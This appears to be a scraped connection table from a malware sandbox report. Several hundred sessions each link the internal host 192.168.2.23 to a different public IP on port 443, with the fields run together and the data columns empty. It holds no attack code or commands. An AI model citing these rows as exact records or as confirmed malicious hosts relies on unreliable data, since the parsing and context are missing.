                                                12596192.168.2.234315653.55.40.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12597192.168.2.2360950159.113.131.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12598192.168.2.2338872160.59.151.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12599192.168.2.2348462193.189.208.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12600192.168.2.2359640173.167.98.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12601192.168.2.234422084.76.53.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12602192.168.2.2352992178.72.120.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12603192.168.2.2354920147.86.234.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12604192.168.2.234640018.79.103.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12605192.168.2.235350824.179.154.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12606192.168.2.2333938139.38.214.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12607192.168.2.235748858.223.200.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12608192.168.2.23355844.136.223.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12609192.168.2.234739862.72.74.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12610192.168.2.234142812.223.176.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12611192.168.2.2339048173.9.5.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12612192.168.2.233464632.215.120.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12613192.168.2.235290619.189.239.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12614192.168.2.2350636146.150.206.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12615192.168.2.2355224211.168.178.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12616192.168.2.235156846.152.27.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12617192.168.2.234814235.210.80.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12618192.168.2.2360416135.54.126.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12619192.168.2.235091290.71.52.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12620192.168.2.2336044189.174.209.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12621192.168.2.2346070219.143.46.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12622192.168.2.2336556101.33.100.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12623192.168.2.2343790145.172.105.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12624192.168.2.2335888174.1.25.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12625192.168.2.2347826158.132.37.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12626192.168.2.2333582193.252.146.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12627192.168.2.234445482.159.244.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12628192.168.2.2335170145.50.76.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12629192.168.2.2343652168.54.223.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12630192.168.2.235124296.130.151.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12631192.168.2.2352898207.196.247.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12632192.168.2.2345448105.105.215.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12633192.168.2.234843014.206.131.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12634192.168.2.234273276.35.192.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12635192.168.2.2360738185.27.3.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12636192.168.2.234558841.147.124.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12637192.168.2.234051650.64.87.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12638192.168.2.2346608197.30.222.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12639192.168.2.2346048156.141.7.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12640192.168.2.235410499.192.101.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12641192.168.2.2342868209.64.42.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12642192.168.2.234277449.116.155.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12643192.168.2.234252854.59.123.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12644192.168.2.2352002101.9.126.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12645192.168.2.2358634217.219.61.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12646192.168.2.2352830180.59.108.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12647192.168.2.2336616167.74.79.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12648192.168.2.2351858206.34.85.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12649192.168.2.2360436196.220.201.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12650192.168.2.235592448.77.135.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12651192.168.2.2353514168.75.112.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12652192.168.2.2344318201.102.93.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12653192.168.2.233947436.107.27.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12654192.168.2.2349748167.43.231.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12655192.168.2.2349468103.124.198.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12656192.168.2.2337764160.116.37.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12657192.168.2.2341804124.76.17.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12658192.168.2.2341866175.187.213.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12659192.168.2.2350770210.198.144.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12660192.168.2.2341368201.119.63.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12661192.168.2.2343250189.2.105.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12662192.168.2.235730890.9.87.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12663192.168.2.233332480.198.91.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12664192.168.2.233926088.221.238.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12665192.168.2.2345072165.128.231.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12666192.168.2.2351528108.151.254.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12667192.168.2.23425708.211.0.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12668192.168.2.2341718135.21.78.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12669192.168.2.2348916195.194.107.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12670192.168.2.235305425.250.169.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12671192.168.2.233778899.57.175.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12672192.168.2.2337444210.109.112.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12673192.168.2.2343702205.174.157.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12674192.168.2.2342836155.139.79.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12675192.168.2.2339886184.129.211.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12676192.168.2.2353946148.170.20.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12677192.168.2.234808670.78.12.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12678192.168.2.234073885.20.231.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12679192.168.2.235133449.134.40.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12680192.168.2.2350044120.23.252.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12681192.168.2.2351400107.113.6.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12682192.168.2.2360928198.102.199.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12683192.168.2.2333302179.170.143.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12684192.168.2.234054251.186.148.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12685192.168.2.2338084200.123.123.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12686192.168.2.2347778106.231.250.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12687192.168.2.2350184167.28.48.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12688192.168.2.235238866.83.250.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12689192.168.2.2341824116.47.31.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12690192.168.2.2338790148.238.8.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12691192.168.2.2357840202.193.121.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12692192.168.2.236084448.34.40.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12693192.168.2.2341460117.132.144.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12694192.168.2.234718290.226.160.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12695192.168.2.2351612139.14.53.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12696192.168.2.2334324191.249.32.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12697192.168.2.2338200220.249.27.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12698192.168.2.2350054154.222.25.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12699192.168.2.2342368208.239.131.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12700192.168.2.2342716190.16.248.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12701192.168.2.233877459.191.31.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12702192.168.2.2356176173.133.252.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12703192.168.2.2355430122.37.119.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12704192.168.2.2348336187.194.228.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12705192.168.2.2354304104.192.23.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12706192.168.2.2352942194.159.208.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12707192.168.2.236011871.64.208.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12708192.168.2.2341530208.155.177.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12709192.168.2.2358886125.67.248.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12710192.168.2.233300860.134.71.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12711192.168.2.2337866153.99.164.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12712192.168.2.2333774176.83.160.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12713192.168.2.2355978131.221.155.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12714192.168.2.23395721.199.194.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12715192.168.2.234387668.242.72.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12716192.168.2.2354694195.98.14.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12717192.168.2.2355864199.38.234.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12718192.168.2.234748445.90.49.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12719192.168.2.2358598220.202.155.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12720192.168.2.2352584154.159.216.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12721192.168.2.2338346116.23.249.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12722192.168.2.235137848.246.155.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12723192.168.2.233280620.9.129.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12724192.168.2.233952212.94.57.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12725192.168.2.235202832.248.95.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12726192.168.2.2354576184.15.171.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12727192.168.2.234815495.129.243.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12728192.168.2.235147644.84.60.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12729192.168.2.234352296.84.76.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12730192.168.2.2345894153.180.6.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12731192.168.2.2347440164.34.80.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12732192.168.2.2359056137.255.38.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12733192.168.2.23411504.149.200.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12734192.168.2.233999452.55.96.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12735192.168.2.2346916207.42.33.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12736192.168.2.23376601.72.35.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12737192.168.2.2356572138.86.213.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12738192.168.2.2349218220.229.129.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12739192.168.2.233483088.21.128.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12740192.168.2.234476296.39.47.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12741192.168.2.235015484.33.110.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12742192.168.2.234211078.217.116.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12743192.168.2.233418842.96.55.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12744192.168.2.2357812101.154.0.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12745192.168.2.2333934123.206.45.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12746192.168.2.233979461.92.226.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12747192.168.2.2359774165.211.101.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12748192.168.2.2354332153.94.134.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12749192.168.2.233305012.182.122.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12750192.168.2.2341190177.42.16.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12751192.168.2.233560657.168.212.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12752192.168.2.23513342.179.255.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12753192.168.2.235848673.6.167.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12754192.168.2.235933675.185.174.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12755192.168.2.2350036133.128.117.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12756192.168.2.2356424106.206.54.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12757192.168.2.2351634114.29.112.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12758192.168.2.2344564120.100.52.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12759192.168.2.234926877.17.166.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12760192.168.2.2357408133.133.24.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12761192.168.2.2347504112.79.18.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12762192.168.2.2352854198.133.42.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12763192.168.2.2347352213.106.26.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12764192.168.2.2342298210.134.208.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12765192.168.2.235102287.189.219.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12766192.168.2.2351892161.50.180.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12767192.168.2.234896218.225.246.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12768192.168.2.2341784128.178.22.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12769192.168.2.2348050187.71.255.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12770192.168.2.2341454155.66.212.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12771192.168.2.23511342.64.225.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12772192.168.2.235577665.197.135.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12773192.168.2.236015694.225.251.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12774192.168.2.2351888124.42.60.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12775192.168.2.2359940160.70.133.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12776192.168.2.234283267.149.198.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12777192.168.2.235552881.119.46.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12778192.168.2.2358600195.239.147.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12779192.168.2.2339686137.149.58.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12780192.168.2.2356216141.189.5.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12781192.168.2.2335046112.232.239.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12782192.168.2.2336936144.83.37.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12783192.168.2.235459050.20.82.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12784192.168.2.2335652192.254.185.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12785192.168.2.2359622136.130.129.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12786192.168.2.235164262.176.186.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12787192.168.2.233281240.208.236.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12788192.168.2.2339392221.199.34.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12789192.168.2.233989081.114.103.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12790192.168.2.2359450160.126.171.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12791192.168.2.233553679.150.72.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12792192.168.2.2354050192.126.72.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12793192.168.2.2345382221.247.195.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12794192.168.2.23421569.206.8.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12795192.168.2.2354232173.133.255.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12796192.168.2.2352140198.116.180.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12797192.168.2.235252488.58.171.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12798192.168.2.2334196181.141.163.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12799192.168.2.2339848175.218.225.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12800192.168.2.235843024.220.176.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12801192.168.2.2341778184.27.112.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12802192.168.2.235924291.34.82.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12803192.168.2.235527295.27.191.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12804192.168.2.2349718160.148.123.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12805192.168.2.234317445.185.177.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12806192.168.2.2336128221.237.105.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12807192.168.2.233659899.74.94.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12808192.168.2.2339018177.239.184.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12809192.168.2.2339884126.117.241.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12810192.168.2.2345728130.120.236.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12811192.168.2.235357882.6.12.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12812192.168.2.2360966190.104.149.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12813192.168.2.235142020.142.172.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12814192.168.2.2347650102.253.254.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12815192.168.2.233500836.227.234.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12816192.168.2.2345514147.8.236.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12817192.168.2.233565079.11.123.13443
                                                TimestampBytes transferredDirectionData


